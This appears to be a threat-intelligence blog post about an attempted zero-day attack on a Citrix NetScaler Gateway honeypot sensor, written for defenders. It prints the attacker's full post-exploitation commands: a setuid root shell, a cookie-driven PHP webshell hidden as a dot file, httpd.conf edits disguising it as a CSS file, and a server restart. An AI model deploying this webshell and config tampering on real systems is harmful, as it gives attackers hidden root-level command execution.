threat_intelligence473 wordsRead on Arc Codex

Swarming Against Citrix 0

GreyNoise observes adversary activity through our Global Observation Grid (GOG), a network of sensors that draws attacker scanning and exploitation onto infrastructure we control. This lets us study adversary infrastructure, tooling, and tradecraft directly, without waiting for a victim investigation. GreyNoise also expands the GOG through Project Swarm, which enables the broader security community to join the effort. The activity discussed in this blog was derived from a Swarm participant sensor. On 24 September 2026, a malicious cyber actor (MCA) used 149.104.78.141 to attempt zero-day exploitation against a Citrix NetScaler Gateway. At the time, there were no CVE-specific detections for the attack due to it occurring pre-disclosure. However, GreyNoise still detected and labeled the activity as fundamentally malicious within seconds due to behavioral detections. GreyNoise will not publish full details of the exploitation chain at this time. Patches are available and post-exploitation details are included below. Exploitation before disclosure Post-Exploitation Though the adversary was unsuccessful in gaining a foothold on the targeted Swarm sensor, their post-exploitation playbook was revealed. The MCA attempted to set both the Set User ID (setuid) and Set Group ID (setgid) bits on /bin/sh to obtain a root shell and install a password-protected webshell that accepts communication by the cookie value sent by the adversary. This may be to avoid persisting their commands in web logs. The MCA then attempted to configure the web server to treat their installed dot file (.ctxs.receiver - hidden by default) as a PHP file despite not having a .php extension. The MCA tried to create an alias which would route requests for a non-existent cascading style sheet (CSS) (receiver.min.css) to .ctxs.receiver; the MCA also attempted to create an additional AliasMatch setting which would provide similar functionality but allow for a more flexible pattern match so that variable characters added to the receiver.min.[0-9a-f].css file path would still route to the webshell. Lastly, the adversary attempted to kill the httpd process to restart the server. chmod 6555 /bin/sh mkdir -p /var/netscaler/logon/LogonPoint/custom cat > /var/netscaler/logon/LogonPoint/custom/.ctxs.receiver <<'EOF' "&&!empty($_COOKIE["NSC_TASS"]))passthru(urldecode($_COOKIE["NSC_TASS"])); ?> EOF grep -q ctxs.receiver /etc/httpd.conf || perl -ni -e 'if(!$d && m#Alias /logon/ "/var/netscaler/logon/"#){print qq( \n SetHandler application/x-httpd-php\n Header always set Cache-Control \"no-store, no-cache, must-revalidate\"\n Header always set Pragma \"no-cache\"\n \n Alias /logon/LogonPoint/custom/receiver.min.css "/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver"\n AliasMatch ^/logon/LogonPoint/custom/receiver\\.min\\.[0-9a-f]+\\.css\$ \"/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver\"\n);$d=1} print' /etc/httpd.conf grep -q 'AliasMatch .*receiver.min' /etc/httpd.conf || perl -ni -e 'if(!$d && m#Alias /logon/LogonPoint/custom/receiver.min.css#){print; print qq( AliasMatch ^/logon/LogonPoint/custom/receiver\\.min\\.[0-9a-f]+\\.css\$ \"/var/netscaler/logon/LogonPoint/custom/.ctxs.receiver\"\n);$d=1; next} print' /etc/httpd.conf perl -pi -e 's/php_flag engine off/php_flag engine on /' /etc/httpd.conf kill -HUP `cat /var/run/httpd.pid` Indicators of Compromise There are other indicators being shared in the community at a higher Traffic Light Protocol (TLP) level than we can put in this blog; none of the indicator sets should be considered exhaustive. Due to the nature of the vulnerability, adversaries have a wide range of options to poison server logs with variable malicious payloads as part of the exploitation sequence.

How it works

Once you click Generate, Ollama reads this article and crafts 5 comprehension questions. Your answers are graded against the article content — general knowledge won't be enough. Score 70+ to count toward your certificate.

Questions are cached — you'll always get the same 5 for this article.